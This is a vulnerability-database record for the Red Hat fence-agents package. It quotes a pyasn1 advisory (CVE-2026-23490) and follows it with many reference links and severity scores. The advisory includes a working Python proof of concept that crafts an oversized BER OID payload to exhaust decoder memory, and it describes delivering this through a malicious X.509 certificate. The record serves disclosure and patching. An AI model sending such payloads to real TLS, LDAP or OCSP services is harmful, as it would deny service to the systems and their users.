Lookup for vulnerable packages by Package URL.

Purlpkg:rpm/redhat/fence-agents@4.16.0-13.el10_1?arch=2
Typerpm
Namespaceredhat
Namefence-agents
Version4.16.0-13.el10_1
Qualifiers
arch 2
Subpath
Is_vulnerabletrue
Next_non_vulnerable_versionnull
Latest_non_vulnerable_versionnull
Affected_by_vulnerabilities
0
url VCID-bptp-5gn6-eucd
vulnerability_id VCID-bptp-5gn6-eucd
summary
pyasn1 has a DoS vulnerability in decoder
### Summary

After reviewing pyasn1 v0.6.1 a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets.

### Details

The integer issue can be found in the decoder as `reloid += ((subId << 7) + nextSubId,)`: https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496

### PoC

For the DoS:
```py
import pyasn1.codec.ber.decoder as decoder
import pyasn1.type.univ as univ
import sys
import resource

# Deliberately set memory limit to display PoC
try:
    resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024))
    print("[*] Memory limit set to 100MB")
except:
    print("[-] Could not set memory limit")

# Test with different payload sizes to find the DoS threshold
payload_size_mb = int(sys.argv[1])

print(f"[*] Testing with {payload_size_mb}MB payload...")

payload_size = payload_size_mb * 1024 * 1024
# Create payload with continuation octets
# Each 0x81 byte indicates continuation, causing bit shifting in decoder
payload = b'\x81' * payload_size + b'\x00'
length = len(payload)

# DER length encoding (supports up to 4GB)
if length < 128:
    length_bytes = bytes([length])
elif length < 256:
    length_bytes = b'\x81' + length.to_bytes(1, 'big')
elif length < 256**2:
    length_bytes = b'\x82' + length.to_bytes(2, 'big')
elif length < 256**3:
    length_bytes = b'\x83' + length.to_bytes(3, 'big')
else:
    # 4 bytes can handle up to 4GB
    length_bytes = b'\x84' + length.to_bytes(4, 'big')

# Use OID (0x06) for more aggressive parsing
malicious_packet = b'\x06' + length_bytes + payload

print(f"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB")

try:
    print("[*] Decoding (this may take time or exhaust memory)...")
    result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier())

    print(f'[+] Decoded successfully')
    print(f'[!] Object size: {sys.getsizeof(result[0])} bytes')

    # Try to convert to string
    print('[*] Converting to string...')
    try:
        str_result = str(result[0])
        print(f'[+] String succeeded: {len(str_result)} chars')
        if len(str_result) > 10000:
            print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!')
    except MemoryError:
        print(f'[-] MemoryError during string conversion!')
    except Exception as e:
        print(f'[-] {type(e).__name__} during string conversion')

except MemoryError:
    print('[-] MemoryError: Out of memory!')
except Exception as e:
    print(f'[-] Error: {type(e).__name__}: {e}')


print("\n[*] Test completed")
```


Screenshots with the results:

#### DoS
<img width="944" height="207" alt="Screenshot_20251219_160840" src="https://github.com/user-attachments/assets/68b9566b-5ee1-47b0-a269-605b037dfc4f" />

<img width="931" height="231" alt="Screenshot_20251219_152815" src="https://github.com/user-attachments/assets/62eacf4f-eb31-4fba-b7a8-e8151484a9fa" />

#### Leak analysis

A potential heap leak was investigated but came back clean:
```
[*] Creating 1000KB payload...
[*] Decoding with pyasn1...
[*] Materializing to string...
[+] Decoded 2157784 characters
[+] Binary representation: 896001 bytes
[+] Dumped to heap_dump.bin

[*] First 64 bytes (hex):
  01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081

[*] First 64 bytes (ASCII/hex dump):
  0000: 01 02 04 08 10 20 40 81 02 04 08 10 20 40 81 02  ..... @..... @..
  0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08  ... @..... @....
  0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20  . @..... @..... 
  0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81  @..... @..... @.

[*] Digit distribution analysis:
  '0':  10.1%
  '1':   9.9%
  '2':  10.0%
  '3':   9.9%
  '4':   9.9%
  '5':  10.0%
  '6':  10.0%
  '7':  10.0%
  '8':   9.9%
  '9':  10.1%
```

### Scenario

1. An attacker creates a malicious X.509 certificate.
2. The application validates certificates.
3. The application accepts the malicious certificate and tries decoding resulting in the issues mentioned above.

### Impact

This issue can affect resource consumption and hang systems or stop services.
This may affect:
- LDAP servers
- TLS/SSL endpoints
- OCSP responders
- etc.

### Recommendation

Add a limit to the allowed bytes in the decoder.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23490.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23490.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-23490
reference_id
reference_type
scores
0
value 0.00021
scoring_system epss
scoring_elements 0.05876
published_at 2026-04-29T12:55:00Z
1
value 0.00021
scoring_system epss
scoring_elements 0.05866
published_at 2026-04-26T12:55:00Z
2
value 0.00021
scoring_system epss
scoring_elements 0.05829
published_at 2026-04-24T12:55:00Z
3
value 0.00021
scoring_system epss
scoring_elements 0.05797
published_at 2026-04-21T12:55:00Z
4
value 0.00021
scoring_system epss
scoring_elements 0.05649
published_at 2026-04-18T12:55:00Z
5
value 0.00021
scoring_system epss
scoring_elements 0.05637
published_at 2026-04-16T12:55:00Z
6
value 0.00021
scoring_system epss
scoring_elements 0.05682
published_at 2026-04-13T12:55:00Z
7
value 0.00021
scoring_system epss
scoring_elements 0.05688
published_at 2026-04-12T12:55:00Z
8
value 0.00021
scoring_system epss
scoring_elements 0.05696
published_at 2026-04-11T12:55:00Z
9
value 0.00021
scoring_system epss
scoring_elements 0.05716
published_at 2026-04-09T12:55:00Z
10
value 0.00021
scoring_system epss
scoring_elements 0.0569
published_at 2026-04-08T12:55:00Z
11
value 0.00021
scoring_system epss
scoring_elements 0.05652
published_at 2026-04-07T12:55:00Z
12
value 0.00021
scoring_system epss
scoring_elements 0.05659
published_at 2026-04-04T12:55:00Z
13
value 0.00021
scoring_system epss
scoring_elements 0.05618
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-23490
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23490
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23490
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/pyasn1/pyasn1
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/pyasn1/pyasn1
5
reference_url https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496
6
reference_url https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/
url https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970
7
reference_url https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6
8
reference_url https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/
url https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2
9
reference_url https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T19:23:28Z/
url https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq
10
reference_url https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2026/02/msg00002.html
11
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-23490
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-23490
12
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1125753
reference_id 1125753
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1125753
13
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2430472
reference_id 2430472
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2430472
14
reference_url https://github.com/advisories/GHSA-63vm-454h-vhhq
reference_id GHSA-63vm-454h-vhhq
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-63vm-454h-vhhq
15
reference_url https://access.redhat.com/errata/RHSA-2026:1903
reference_id RHSA-2026:1903
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:1903
16
reference_url https://access.redhat.com/errata/RHSA-2026:1904
reference_id RHSA-2026:1904
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:1904
17
reference_url https://access.redhat.com/errata/RHSA-2026:1905
reference_id RHSA-2026:1905
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:1905
18
reference_url https://access.redhat.com/errata/RHSA-2026:1906
reference_id RHSA-2026:1906
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:1906
19
reference_url https://access.redhat.com/errata/RHSA-2026:2221
reference_id RHSA-2026:2221
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2221
20
reference_url https://access.redhat.com/errata/RHSA-2026:2299
reference_id RHSA-2026:2299
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2299
21
reference_url https://access.redhat.com/errata/RHSA-2026:2300
reference_id RHSA-2026:2300
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2300
22
reference_url https://access.redhat.com/errata/RHSA-2026:2302
reference_id RHSA-2026:2302
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2302
23
reference_url https://access.redhat.com/errata/RHSA-2026:2303
reference_id RHSA-2026:2303
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2303
24
reference_url https://access.redhat.com/errata/RHSA-2026:2309
reference_id RHSA-2026:2309
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2309
25
reference_url https://access.redhat.com/errata/RHSA-2026:2453
reference_id RHSA-2026:2453
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2453
26
reference_url https://access.redhat.com/errata/RHSA-2026:2460
reference_id RHSA-2026:2460
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2460
27
reference_url https://access.redhat.com/errata/RHSA-2026:2483
reference_id RHSA-2026:2483
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2483
28
reference_url https://access.redhat.com/errata/RHSA-2026:2486
reference_id RHSA-2026:2486
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2486
29
reference_url https://access.redhat.com/errata/RHSA-2026:2712
reference_id RHSA-2026:2712
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2712
30
reference_url https://access.redhat.com/errata/RHSA-2026:2758
reference_id RHSA-2026:2758
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2758
31
reference_url https://access.redhat.com/errata/RHSA-2026:3354
reference_id RHSA-2026:3354
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3354
32
reference_url https://access.redhat.com/errata/RHSA-2026:3359
reference_id RHSA-2026:3359
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3359
33
reference_url https://access.redhat.com/errata/RHSA-2026:3958
reference_id RHSA-2026:3958
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3958
34
reference_url https://access.redhat.com/errata/RHSA-2026:3959
reference_id RHSA-2026:3959
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3959
35
reference_url https://access.redhat.com/errata/RHSA-2026:4138
reference_id RHSA-2026:4138
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4138
36
reference_url https://access.redhat.com/errata/RHSA-2026:4139
reference_id RHSA-2026:4139
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4139
37
reference_url https://access.redhat.com/errata/RHSA-2026:4140
reference_id RHSA-2026:4140
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4140
38
reference_url https://access.redhat.com/errata/RHSA-2026:4141
reference_id RHSA-2026:4141
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4141
39
reference_url https://access.redhat.com/errata/RHSA-2026:4142
reference_id RHSA-2026:4142
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4142
40
reference_url https://access.redhat.com/errata/RHSA-2026:4143
reference_id RHSA-2026:4143
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4143
41
reference_url https://access.redhat.com/errata/RHSA-2026:4144
reference_id RHSA-2026:4144
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4144
42
reference_url https://access.redhat.com/errata/RHSA-2026:4145
reference_id RHSA-2026:4145
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4145
43
reference_url https://access.redhat.com/errata/RHSA-2026:4146
reference_id RHSA-2026:4146
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4146
44
reference_url https://access.redhat.com/errata/RHSA-2026:4147
reference_id RHSA-2026:4147
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4147
45
reference_url https://access.redhat.com/errata/RHSA-2026:4148
reference_id RHSA-2026:4148
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4148
46
reference_url https://access.redhat.com/errata/RHSA-2026:4943
reference_id RHSA-2026:4943
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4943
47
reference_url https://access.redhat.com/errata/RHSA-2026:5606
reference_id RHSA-2026:5606
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5606
48
reference_url https://usn.ubuntu.com/7975-1/
reference_id USN-7975-1
reference_type
scores
url https://usn.ubuntu.com/7975-1/
49
reference_url https://usn.ubuntu.com/8134-1/
reference_id USN-8134-1
reference_type
scores
url https://usn.ubuntu.com/8134-1/
fixed_packages
aliases CVE-2026-23490, GHSA-63vm-454h-vhhq
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-bptp-5gn6-eucd
Fixing_vulnerabilities
Risk_score4.0
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:rpm/redhat/fence-agents@4.16.0-13.el10_1%3Farch=2